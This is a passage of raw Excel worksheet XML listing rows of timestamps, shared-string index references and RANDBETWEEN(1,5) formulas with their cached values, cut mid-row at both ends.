      <c r="E1216" t="s">
        <v>1314</v>
      </c>
      <c r="F1216">
        <f t="shared" ca="1" si="18"/>
        <v>5</v>
      </c>
    </row>
    <row r="1217" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A1217" s="1">
        <v>43536.343518518515</v>
      </c>
      <c r="B1217" t="s">
        <v>19</v>
      </c>
      <c r="C1217" t="s">
        <v>10</v>
      </c>
      <c r="D1217" t="s">
        <v>20</v>
      </c>
      <c r="E1217" s="2" t="s">
        <v>1315</v>
      </c>
      <c r="F1217">
        <f t="shared" ca="1" si="18"/>
        <v>3</v>
      </c>
    </row>
    <row r="1218" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1218" s="1">
        <v>43536.330543981479</v>
      </c>
      <c r="B1218" t="s">
        <v>19</v>
      </c>
      <c r="C1218" t="s">
        <v>454</v>
      </c>
      <c r="E1218" s="2" t="s">
        <v>1316</v>
      </c>
      <c r="F1218">
        <f t="shared" ref="F1218:F1281" ca="1" si="19">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="1219" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1219" s="1">
        <v>43536.308634259258</v>
      </c>
      <c r="B1219" t="s">
        <v>5</v>
      </c>
      <c r="C1219" t="s">
        <v>65</v>
      </c>
      <c r="E1219" s="2" t="s">
        <v>1317</v>
      </c>
      <c r="F1219">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1220" s="1">
        <v>43536.302210648151</v>
      </c>
      <c r="B1220" t="s">
        <v>5</v>
      </c>
      <c r="C1220" t="s">
        <v>10</v>
      </c>
      <c r="D1220" t="s">
        <v>178</v>
      </c>
      <c r="E1220" t="s">
        <v>1318</v>
      </c>
      <c r="F1220">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1221" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1221" s="1">
        <v>43536.299618055556</v>
      </c>
      <c r="B1221" t="s">
        <v>5</v>
      </c>
      <c r="C1221" t="s">
        <v>48</v>
      </c>
      <c r="E1221" s="2" t="s">
        <v>1319</v>
      </c>
      <c r="F1221">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1222" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1222" s="1">
        <v>43536.270613425928</v>
      </c>
      <c r="B1222" t="s">
        <v>19</v>
      </c>
      <c r="C1222" t="s">
        <v>48</v>
      </c>
      <c r="E1222" s="2" t="s">
        <v>1320</v>
      </c>
      <c r="F1222">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1223" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1223" s="1">
        <v>43536.268206018518</v>
      </c>
      <c r="B1223" t="s">
        <v>19</v>
      </c>
      <c r="C1223" t="s">
        <v>139</v>
      </c>
      <c r="E1223" s="2" t="s">
        <v>1321</v>
      </c>
      <c r="F1223">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1224" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1224" s="1">
        <v>43536.255104166667</v>
      </c>
      <c r="B1224" t="s">
        <v>5</v>
      </c>
      <c r="C1224" t="s">
        <v>43</v>
      </c>
      <c r="E1224" s="2" t="s">
        <v>1322</v>
      </c>
      <c r="F1224">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1225" s="1">
        <v>43536.254027777781</v>
      </c>
      <c r="B1225" t="s">
        <v>35</v>
      </c>
      <c r="C1225" t="s">
        <v>41</v>
      </c>
      <c r="E1225" t="s">
        <v>1323</v>
      </c>
      <c r="F1225">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1226" s="1">
        <v>43536.239259259259</v>
      </c>
      <c r="B1226" t="s">
        <v>5</v>
      </c>
      <c r="C1226" t="s">
        <v>41</v>
      </c>
      <c r="F1226">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1227" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1227" s="1">
        <v>43536.237337962964</v>
      </c>
      <c r="B1227" t="s">
        <v>13</v>
      </c>
      <c r="C1227" t="s">
        <v>559</v>
      </c>
      <c r="E1227" s="2" t="s">
        <v>1324</v>
      </c>
      <c r="F1227">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1228" s="1">
        <v>43536.235289351855</v>
      </c>
      <c r="B1228" t="s">
        <v>5</v>
      </c>
      <c r="C1228" t="s">
        <v>1325</v>
      </c>
      <c r="E1228" t="s">
        <v>1326</v>
      </c>
      <c r="F1228">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1229" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1229" s="1">
        <v>43536.233819444446</v>
      </c>
      <c r="B1229" t="s">
        <v>13</v>
      </c>
      <c r="C1229" t="s">
        <v>731</v>
      </c>
      <c r="E1229" s="2" t="s">
        <v>1327</v>
      </c>
      <c r="F1229">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1230" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1230" s="1">
        <v>43536.231979166667</v>
      </c>
      <c r="B1230" t="s">
        <v>5</v>
      </c>
      <c r="C1230" t="s">
        <v>410</v>
      </c>
      <c r="E1230" s="2" t="s">
        <v>1328</v>
      </c>
      <c r="F1230">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1231" s="1">
        <v>43536.205358796295</v>
      </c>
      <c r="B1231" t="s">
        <v>1305</v>
      </c>
      <c r="C1231" t="s">
        <v>11</v>
      </c>
      <c r="F1231">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1232" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1232" s="1">
        <v>43536.205104166664</v>
      </c>
      <c r="B1232" t="s">
        <v>19</v>
      </c>
      <c r="C1232" t="s">
        <v>41</v>
      </c>
      <c r="E1232" s="2" t="s">
        <v>1329</v>
      </c>
      <c r="F1232">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1233" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1233" s="1">
        <v>43536.195474537039</v>
      </c>
      <c r="B1233" t="s">
        <v>13</v>
      </c>
      <c r="C1233" t="s">
        <v>260</v>
      </c>
      <c r="E1233" s="2" t="s">
        <v>1330</v>
      </c>
      <c r="F1233">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1234" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1234" s="1">
        <v>43536.195462962962</v>
      </c>
      <c r="B1234" t="s">
        <v>19</v>
      </c>
      <c r="C1234" t="s">
        <v>48</v>
      </c>
      <c r="E1234" s="2" t="s">
        <v>1331</v>
      </c>
      <c r="F1234">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1235" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1235" s="1">
        <v>43536.185995370368</v>
      </c>
      <c r="B1235" t="s">
        <v>5</v>
      </c>
      <c r="C1235" t="s">
        <v>134</v>
      </c>
      <c r="E1235" s="2" t="s">
        <v>1332</v>
      </c>
      <c r="F1235">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1236" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1236" s="1">
        <v>43536.171157407407</v>
      </c>
      <c r="B1236" t="s">
        <v>1305</v>
      </c>
      <c r="C1236" t="s">
        <v>410</v>
      </c>
      <c r="E1236" s="2" t="s">
        <v>1333</v>
      </c>
      <c r="F1236">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1237" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1237" s="1">
        <v>43536.143796296295</v>
      </c>
      <c r="B1237" t="s">
        <v>13</v>
      </c>
      <c r="C1237" t="s">
        <v>197</v>
      </c>
      <c r="E1237" s="2" t="s">
        <v>1334</v>
      </c>
      <c r="F1237">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1238" s="1">
        <v>43536.134317129632</v>
      </c>
      <c r="B1238" t="s">
        <v>9</v>
      </c>
      <c r="C1238" t="s">
        <v>41</v>
      </c>
      <c r="E1238" t="s">
        <v>1335</v>
      </c>
      <c r="F1238">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1239" s="1">
        <v>43536.112361111111</v>
      </c>
      <c r="B1239" t="s">
        <v>5</v>
      </c>
      <c r="C1239" t="s">
        <v>71</v>
      </c>
      <c r="E1239" t="s">
        <v>1336</v>
      </c>
      <c r="F1239">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1240" s="1">
        <v>43536.105324074073</v>
      </c>
      <c r="B1240" t="s">
        <v>5</v>
      </c>
      <c r="C1240" t="s">
        <v>41</v>
      </c>
      <c r="E1240" t="s">
        <v>1337</v>
      </c>
      <c r="F1240">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1241" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1241" s="1">
        <v>43535.977569444447</v>
      </c>
      <c r="B1241" t="s">
        <v>5</v>
      </c>
      <c r="C1241" t="s">
        <v>253</v>
      </c>
      <c r="E1241" s="2" t="s">
        <v>1338</v>
      </c>
      <c r="F1241">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1242" s="1">
        <v>43535.923935185187</v>
      </c>
      <c r="B1242" t="s">
        <v>19</v>
      </c>
      <c r="C1242" t="s">
        <v>73</v>
      </c>
      <c r="E1242" t="s">
        <v>1339</v>
      </c>
      <c r="F1242">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1243" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1243" s="1">
        <v>43535.905740740738</v>
      </c>
      <c r="B1243" t="s">
        <v>19</v>
      </c>
      <c r="C1243" t="s">
        <v>140</v>
      </c>
      <c r="D1243" t="s">
        <v>141</v>
      </c>
      <c r="E1243" s="2" t="s">
        <v>1340</v>
      </c>
      <c r="F1243">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1244" s="1">
        <v>43535.831724537034</v>
      </c>
      <c r="B1244" t="s">
        <v>13</v>
      </c>
      <c r="C1244" t="s">
        <v>1341</v>
      </c>
      <c r="E1244" t="s">
        <v>1342</v>
      </c>
      <c r="F1244">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1245" s="1">
        <v>43535.749363425923</v>
      </c>
      <c r="B1245" t="s">
        <v>35</v>
      </c>
      <c r="C1245" t="s">
        <v>10</v>
      </c>
      <c r="D1245" t="s">
        <v>107</v>
      </c>
      <c r="E1245" t="s">
        <v>1343</v>
      </c>
      <c r="F1245">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1246" s="1">
        <v>43535.73846064815</v>
      </c>
      <c r="B1246" t="s">
        <v>9</v>
      </c>
      <c r="C1246" t="s">
        <v>10</v>
      </c>
      <c r="D1246" t="s">
        <v>11</v>
      </c>
      <c r="E1246" t="s">
        <v>1344</v>
      </c>
      <c r="F1246">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1247" s="1">
        <v>43535.70521990741</v>
      </c>
      <c r="B1247" t="s">
        <v>13</v>
      </c>
      <c r="C1247" t="s">
        <v>10</v>
      </c>
      <c r="D1247" t="s">
        <v>52</v>
      </c>
      <c r="E1247" t="s">
        <v>1345</v>
      </c>
      <c r="F1247">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1248" s="1">
        <v>43535.703402777777</v>
      </c>
      <c r="B1248" t="s">
        <v>19</v>
      </c>
      <c r="C1248" t="s">
        <v>10</v>
      </c>
      <c r="D1248" t="s">
        <v>112</v>
      </c>
      <c r="E1248" t="s">
        <v>1346</v>
      </c>
      <c r="F1248">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1249" s="1">
        <v>43535.696238425924</v>
      </c>
      <c r="B1249" t="s">
        <v>13</v>
      </c>
      <c r="C1249" t="s">
        <v>10</v>
      </c>
      <c r="D1249" t="s">
        <v>36</v>
      </c>
      <c r="E1249" t="s">
        <v>1347</v>
      </c>
      <c r="F1249">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1250" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1250" s="1">
        <v>43535.688645833332</v>
      </c>
      <c r="B1250" t="s">
        <v>5</v>
      </c>
      <c r="C1250" t="s">
        <v>71</v>
      </c>
      <c r="E1250" s="2" t="s">
        <v>1348</v>
      </c>
      <c r="F1250">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1251" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1251" s="1">
        <v>43535.684965277775</v>
      </c>
      <c r="B1251" t="s">
        <v>5</v>
      </c>
      <c r="C1251" t="s">
        <v>140</v>
      </c>
      <c r="D1251" t="s">
        <v>234</v>
      </c>
      <c r="E1251" s="2" t="s">
        <v>1349</v>
      </c>
      <c r="F1251">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1252" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1252" s="1">
        <v>43535.664178240739</v>
      </c>
      <c r="B1252" t="s">
        <v>13</v>
      </c>
      <c r="C1252" t="s">
        <v>10</v>
      </c>
      <c r="D1252" t="s">
        <v>33</v>
      </c>
      <c r="E1252" s="2" t="s">
        <v>1350</v>
      </c>
      <c r="F1252">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1253" s="1">
        <v>43535.660891203705</v>
      </c>
      <c r="B1253" t="s">
        <v>5</v>
      </c>
      <c r="C1253" t="s">
        <v>10</v>
      </c>
      <c r="D1253" t="s">
        <v>178</v>
      </c>
      <c r="E1253" t="s">
        <v>1351</v>
      </c>
      <c r="F1253">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1254" s="1">
        <v>43535.6562962963</v>
      </c>
      <c r="B1254" t="s">
        <v>13</v>
      </c>
      <c r="C1254" t="s">
        <v>10</v>
      </c>
      <c r="D1254" t="s">
        <v>92</v>
      </c>
      <c r="E1254" t="s">
        <v>1352</v>
      </c>
      <c r="F1254">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1255" s="1">
        <v>43535.655393518522</v>
      </c>
      <c r="B1255" t="s">
        <v>5</v>
      </c>
      <c r="C1255" t="s">
        <v>260</v>
      </c>
      <c r="F1255">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1256" s="1">
        <v>43535.645983796298</v>
      </c>
      <c r="B1256" t="s">
        <v>5</v>
      </c>
      <c r="C1256" t="s">
        <v>10</v>
      </c>
      <c r="D1256" t="s">
        <v>374</v>
      </c>
      <c r="E1256" t="s">
        <v>1353</v>
      </c>
      <c r="F1256">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1257" s="1">
        <v>43535.644814814812</v>
      </c>
      <c r="B1257" t="s">
        <v>13</v>
      </c>
      <c r="C1257" t="s">
        <v>10</v>
      </c>
      <c r="D1257" t="s">
        <v>163</v>
      </c>
      <c r="E1257" t="s">
        <v>1354</v>
      </c>
      <c r="F1257">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1258" s="1">
        <v>43535.63590277778</v>
      </c>
      <c r="B1258" t="s">
        <v>19</v>
      </c>
      <c r="C1258" t="s">
        <v>10</v>
      </c>
      <c r="D1258" t="s">
        <v>192</v>
      </c>
      <c r="E1258" t="s">
        <v>1355</v>
      </c>
      <c r="F1258">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1259" s="1">
        <v>43535.630671296298</v>
      </c>
      <c r="B1259" t="s">
        <v>19</v>
      </c>
      <c r="C1259" t="s">
        <v>10</v>
      </c>
      <c r="D1259" t="s">
        <v>192</v>
      </c>
      <c r="E1259" t="s">
        <v>1356</v>
      </c>
      <c r="F1259">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1260" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1260" s="1">
        <v>43535.624224537038</v>
      </c>
      <c r="B1260" t="s">
        <v>5</v>
      </c>
      <c r="C1260" t="s">
        <v>10</v>
      </c>
      <c r="E1260" s="2" t="s">
        <v>1357</v>
      </c>
      <c r="F1260">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1261" s="1">
        <v>43535.62059027778</v>
      </c>
      <c r="B1261" t="s">
        <v>13</v>
      </c>
      <c r="C1261" t="s">
        <v>10</v>
      </c>
      <c r="D1261" t="s">
        <v>52</v>
      </c>
      <c r="E1261" t="s">
        <v>1358</v>
      </c>
      <c r="F1261">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1262" s="1">
        <v>43535.591249999998</v>
      </c>
      <c r="B1262" t="s">
        <v>5</v>
      </c>
      <c r="C1262" t="s">
        <v>10</v>
      </c>
      <c r="D1262" t="s">
        <v>6</v>
      </c>
      <c r="E1262" t="s">
        <v>1359</v>
      </c>
      <c r="F1262">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1263" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1263" s="1">
        <v>43535.573506944442</v>
      </c>
      <c r="B1263" t="s">
        <v>5</v>
      </c>
      <c r="C1263" t="s">
        <v>6</v>
      </c>
      <c r="D1263" t="s">
        <v>25</v>
      </c>
      <c r="E1263" s="2" t="s">
        <v>1360</v>
      </c>
      <c r="F1263">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1264" s="1">
        <v>43535.567685185182</v>
      </c>
      <c r="B1264" t="s">
        <v>19</v>
      </c>
      <c r="C1264" t="s">
        <v>10</v>
      </c>
      <c r="D1264" t="s">
        <v>86</v>
      </c>
      <c r="E1264" t="s">
        <v>1361</v>
      </c>
      <c r="F1264">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1265" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1265" s="1">
        <v>43535.561851851853</v>
      </c>
      <c r="B1265" t="s">
        <v>13</v>
      </c>
      <c r="C1265" t="s">
        <v>10</v>
      </c>
      <c r="D1265" t="s">
        <v>251</v>
      </c>
      <c r="E1265" s="2" t="s">
        <v>1362</v>
      </c>
      <c r="F1265">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1266" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1266" s="1">
        <v>43535.555937500001</v>
      </c>
      <c r="B1266" t="s">
        <v>5</v>
      </c>
      <c r="C1266" t="s">
        <v>559</v>
      </c>
      <c r="E1266" s="2" t="s">
        <v>1363</v>
      </c>
      <c r="F1266">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1267" s="1">
        <v>43535.541909722226</v>
      </c>
      <c r="B1267" t="s">
        <v>9</v>
      </c>
      <c r="C1267" t="s">
        <v>10</v>
      </c>
      <c r="D1267" t="s">
        <v>6</v>
      </c>
      <c r="E1267" t="s">
        <v>1364</v>
      </c>
      <c r="F1267">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1268" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1268" s="1">
        <v>43535.540879629632</v>
      </c>
      <c r="B1268" t="s">
        <v>13</v>
      </c>
      <c r="C1268" t="s">
        <v>10</v>
      </c>
      <c r="D1268" t="s">
        <v>336</v>
      </c>
      <c r="E1268" s="2" t="s">
        <v>1365</v>
      </c>
      <c r="F1268">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1269" s="1">
        <v>43535.535428240742</v>
      </c>
      <c r="B1269" t="s">
        <v>19</v>
      </c>
      <c r="C1269" t="s">
        <v>10</v>
      </c>
      <c r="D1269" t="s">
        <v>56</v>
      </c>
      <c r="E1269" t="s">
        <v>1366</v>
      </c>
      <c r="F1269">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1270" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1270" s="1">
        <v>43535.511608796296</v>
      </c>
      <c r="B1270" t="s">
        <v>5</v>
      </c>
      <c r="C1270" t="s">
        <v>6</v>
      </c>
      <c r="D1270" t="s">
        <v>25</v>
      </c>
      <c r="E1270" s="2" t="s">
        <v>1367</v>
      </c>
      <c r="F1270">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1271" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1271" s="1">
        <v>43535.498888888891</v>
      </c>
      <c r="B1271" t="s">
        <v>1305</v>
      </c>
      <c r="C1271" t="s">
        <v>65</v>
      </c>
      <c r="E1271" s="2" t="s">
        <v>1368</v>
      </c>
      <c r="F1271">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1272" s="1">
        <v>43535.483495370368</v>
      </c>
      <c r="B1272" t="s">
        <v>13</v>
      </c>
      <c r="C1272" t="s">
        <v>10</v>
      </c>
      <c r="D1272" t="s">
        <v>151</v>
      </c>
      <c r="E1272" t="s">
        <v>1369</v>
      </c>
      <c r="F1272">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1273" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1273" s="1">
        <v>43535.480486111112</v>
      </c>
      <c r="B1273" t="s">
        <v>35</v>
      </c>
      <c r="C1273" t="s">
        <v>41</v>
      </c>
      <c r="E1273" s="2" t="s">
        <v>1370</v>
      </c>
      <c r="F1273">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1274" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A1274" s="1">
        <v>43535.469375000001</v>
      </c>
      <c r="B1274" t="s">
        <v>5</v>
      </c>
      <c r="C1274" t="s">
        <v>222</v>
      </c>
      <c r="E1274" s="2" t="s">
        <v>1371</v>
      </c>
      <c r="F1274">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1275" s="1">
        <v>43535.454884259256</v>
      </c>
      <c r="B1275" t="s">
        <v>19</v>
      </c>
      <c r="C1275" t="s">
        <v>48</v>
      </c>
      <c r="E1275" t="s">
        <v>1372</v>
      </c>
      <c r="F1275">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1276" s="1">
        <v>43535.45208333333</v>
      </c>
      <c r="B1276" t="s">
        <v>19</v>
      </c>
      <c r="C1276" t="s">
        <v>50</v>
      </c>
      <c r="E1276" t="s">
        <v>1373</v>
      </c>
      <c r="F1276">
        <f t="shared" ca="1" si="19"/>
        <v>4</v>
      </c>
    </row>
    <row r="1277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1277" s="1">
        <v>43535.433923611112</v>
      </c>
      <c r="B1277" t="s">
        <v>19</v>
      </c>
      <c r="C1277" t="s">
        <v>10</v>
      </c>
      <c r="D1277" t="s">
        <v>178</v>
      </c>
      <c r="E1277" t="s">
        <v>1374</v>
      </c>
      <c r="F1277">
        <f t="shared" ca="1" si="19"/>
        <v>5</v>
      </c>
    </row>
    <row r="1278" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1278" s="1">
        <v>43535.42695601852</v>
      </c>
      <c r="B1278" t="s">
        <v>5</v>
      </c>
      <c r="C1278" t="s">
        <v>48</v>
      </c>
      <c r="E1278" s="2" t="s">
        <v>1375</v>
      </c>
      <c r="F1278">
        <f t="shared" ca="1" si="19"/>
        <v>1</v>
      </c>
    </row>
    <row r="1279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1279" s="1">
        <v>43535.418726851851</v>
      </c>
      <c r="B1279" t="s">
        <v>19</v>
      </c>
      <c r="C1279" t="s">
        <v>107</v>
      </c>
      <c r="E1279" t="s">
        <v>1376</v>
      </c>
      <c r="F1279">
        <f t="shared" ca="1" si="19"/>
        <v>3</v>
      </c>
    </row>
    <row r="1280" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1280" s="1">
        <v>43535.406215277777</v>
      </c>
      <c r="B1280" t="s">
        <v>5</v>
      </c>
      <c r="C1280" t="s">
        <v>1377</v>
      </c>
      <c r="D1280" t="s">
        <v>312</v>
      </c>
      <c r="E1280" s="2" t="s">
        <v>1378</v>
      </c>
      <c r="F1280">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1281" s="1">
        <v>43535.398888888885</v>
      </c>
      <c r="B1281" t="s">
        <v>5</v>
      </c>
      <c r="C1281" t="s">
        <v>41</v>
      </c>
      <c r="E1281" t="s">
        <v>1379</v>
      </c>
      <c r="F1281">
        <f t="shared" ca="1" si="19"/>
        <v>2</v>
      </c>
    </row>
    <row r="1282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1282" s="1">
        <v>43535.395590277774</v>
      </c>
      <c r="B1282" t="s">
        <v>1305</v>
      </c>
      <c r="C1282" t="s">
        <v>10</v>
      </c>
      <c r="D1282" t="s">
        <v>86</v>
      </c>
      <c r="E1282" t="s">
        <v>1380</v>
      </c>
      <c r="F1282">
        <f t="shared" ref="F1282:F1345" ca="1" si="20">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="1283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1283" s="1">
        <v>43535.355520833335</v>
      </c>
      <c r="B1283" t="s">
        <v>13</v>
      </c>
      <c r="C1283" t="s">
        <v>1381</v>
      </c>
      <c r="E1283" t="s">
        <v>1382</v>
      </c>
      <c r="F1283">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1284" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1284" s="1">
        <v>43535.349664351852</v>
      </c>
      <c r="B1284" t="s">
        <v>19</v>
      </c>
      <c r="C1284" t="s">
        <v>71</v>
      </c>
      <c r="E1284" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="F1284">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1285" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A1285" s="1">
        <v>43535.342766203707</v>
      </c>
      <c r="B1285" t="s">
        <v>1305</v>
      </c>
      <c r="C1285" t="s">
        <v>71</v>
      </c>
      <c r="E1285" s="2" t="s">
        <v>1384</v>
      </c>
      <c r="F1285">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1286" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A1286" s="1">
        <v>43535.340856481482</v>
      </c>
      <c r="B1286" t="s">
        <v>35</v>
